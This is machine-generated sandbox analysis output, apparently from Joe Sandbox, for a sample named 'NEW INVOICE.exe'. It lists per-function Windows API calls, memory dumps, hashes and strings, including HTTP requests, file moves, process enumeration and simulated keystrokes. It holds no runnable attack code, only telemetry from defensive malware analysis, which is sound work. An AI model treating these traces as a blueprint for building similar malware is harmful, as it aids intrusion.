                                                                                      • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\NEW INVOICE.exe,?,C:\Users\user\Desktop\NEW INVOICE.exe,004A8E80,C:\Users\user\Desktop\NEW INVOICE.exe,0040F3D2), ref: 0040FFCA
                                                                                      • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0045358E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 978794511-0
                                                                                    • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                    • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                                    • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                    • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                    • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                                    • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                    • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00455F01
                                                                                    • _memset.LIBCMT ref: 00455F12
                                                                                    • SendMessageW.USER32 ref: 00455F43
                                                                                    • SendMessageW.USER32(?,0000104B,00000000,?), ref: 00455F82
                                                                                    • SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00455FF5
                                                                                    • _wcslen.LIBCMT ref: 00455FFC
                                                                                    • _wcslen.LIBCMT ref: 00456018
                                                                                    • CharNextW.USER32(00000000,?,?,?), ref: 00456034
                                                                                    • SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00456060
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$_wcslen$CharLongNextWindow_memset
                                                                                    • String ID:
                                                                                    • API String ID: 2321321212-0
                                                                                    • Opcode ID: 1e0cf8b8d25046b6848c8f46273bd4d506c8fc7d824d1fae03d8575ab44ef5d5
                                                                                    • Instruction ID: 728fd5b54b682decfcd50b06f9b7fb359c8698431e162ed45c662fcf507213b6
                                                                                    • Opcode Fuzzy Hash: 1e0cf8b8d25046b6848c8f46273bd4d506c8fc7d824d1fae03d8575ab44ef5d5
                                                                                    • Instruction Fuzzy Hash: 5D41D172204241ABE3108F68DC45BABB7E4FB84321F004A2EF954D72D1E7B9904A8B66
                                                                                    APIs
                                                                                      • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                                      • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                                                                                      • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                                    • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                                                                    • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2014098862-0
                                                                                    • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                    • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                                                    • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                    • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc_malloc$_strcat_strlen
                                                                                    • String ID: AU3_FreeVar
                                                                                    • API String ID: 2184576858-771828931
                                                                                    • Opcode ID: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                                                                    • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                                    • Opcode Fuzzy Hash: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                                                                    • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                                    APIs
                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                                    • DestroyWindow.USER32(?), ref: 0042A751
                                                                                    • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                                    • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                    • String ID: close all
                                                                                    • API String ID: 4174999648-3243417748
                                                                                    • Opcode ID: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                                                                                    • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                                                                    • Opcode Fuzzy Hash: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                                                                                    • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                                                                    APIs
                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                                      • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                    • String ID:
                                                                                    • API String ID: 1291720006-3916222277
                                                                                    • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                    • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                                    • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                    • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastselect
                                                                                    • String ID: HH
                                                                                    • API String ID: 215497628-2761332787
                                                                                    • Opcode ID: 3d89cdb4518712ce7d497f90f16eabf25f5dd16b03f437b50de1b9ff930cdf67
                                                                                    • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                                    • Opcode Fuzzy Hash: 3d89cdb4518712ce7d497f90f16eabf25f5dd16b03f437b50de1b9ff930cdf67
                                                                                    • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __snwprintf__wcsicoll_wcscpy
                                                                                    • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                                    • API String ID: 1729044348-3708979750
                                                                                    • Opcode ID: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
                                                                                    • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                                                                    • Opcode Fuzzy Hash: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
                                                                                    • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                                                                    APIs
                                                                                      • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\NEW INVOICE.exe,?,C:\Users\user\Desktop\NEW INVOICE.exe,004A8E80,C:\Users\user\Desktop\NEW INVOICE.exe,0040F3D2), ref: 0040FFCA
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                                                    • _wcscat.LIBCMT ref: 0044BCAA
                                                                                    • _wcslen.LIBCMT ref: 0044BCB7
                                                                                    • _wcslen.LIBCMT ref: 0044BCCB
                                                                                    • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 2326526234-1173974218
                                                                                    • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                    • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                                                                    • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                    • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                                                                    APIs
                                                                                      • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                                                    • _wcslen.LIBCMT ref: 004366DD
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                                    • GetLastError.KERNEL32 ref: 0043670F
                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                                    • _wcsrchr.LIBCMT ref: 0043674C
                                                                                      • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                    • String ID: \
                                                                                    • API String ID: 321622961-2967466578
                                                                                    • Opcode ID: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                                                                                    • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                                                    • Opcode Fuzzy Hash: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                                                                                    • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                    • API String ID: 1038674560-2734436370
                                                                                    • Opcode ID: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                                                                                    • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
                                                                                    • Opcode Fuzzy Hash: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                                                                                    • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                                                                                    APIs
                                                                                    • EnumProcesses.PSAPI(?,00000800,?,?,00444263,?,?,?), ref: 00436EEC
                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?), ref: 00436F44
                                                                                    • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00436F59
                                                                                    • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 00436F71
                                                                                    • __wsplitpath.LIBCMT ref: 00436FA0
                                                                                    • _wcscat.LIBCMT ref: 00436FB2
                                                                                    • __wcsicoll.LIBCMT ref: 00436FC4
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,00000104,00000000,?,00000004,?), ref: 00437003
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                                                                    • String ID:
                                                                                    • API String ID: 2903788889-0
                                                                                    • Opcode ID: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                                    • Instruction ID: e95795bff0e4a6f47310c77509a1ee8dff79588992f1933afd8058d7896a4498
                                                                                    • Opcode Fuzzy Hash: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                                    • Instruction Fuzzy Hash: C831A5B5108341ABD725DF54D881EEF73E8BBC8704F00891EF6C587241DBB9AA89C766
                                                                                    APIs
                                                                                    • DeleteObject.GDI32(?), ref: 0044157D
                                                                                    • GetDC.USER32(00000000), ref: 00441585
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3864802216-0
                                                                                    • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                    • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                                                                                    • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                    • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                                                                                    APIs
                                                                                    • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                      • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                      • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                      • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                    • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                      • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                    • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                      • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                    • ExitThread.KERNEL32 ref: 0041410F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                    • __freefls@4.LIBCMT ref: 00414135
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
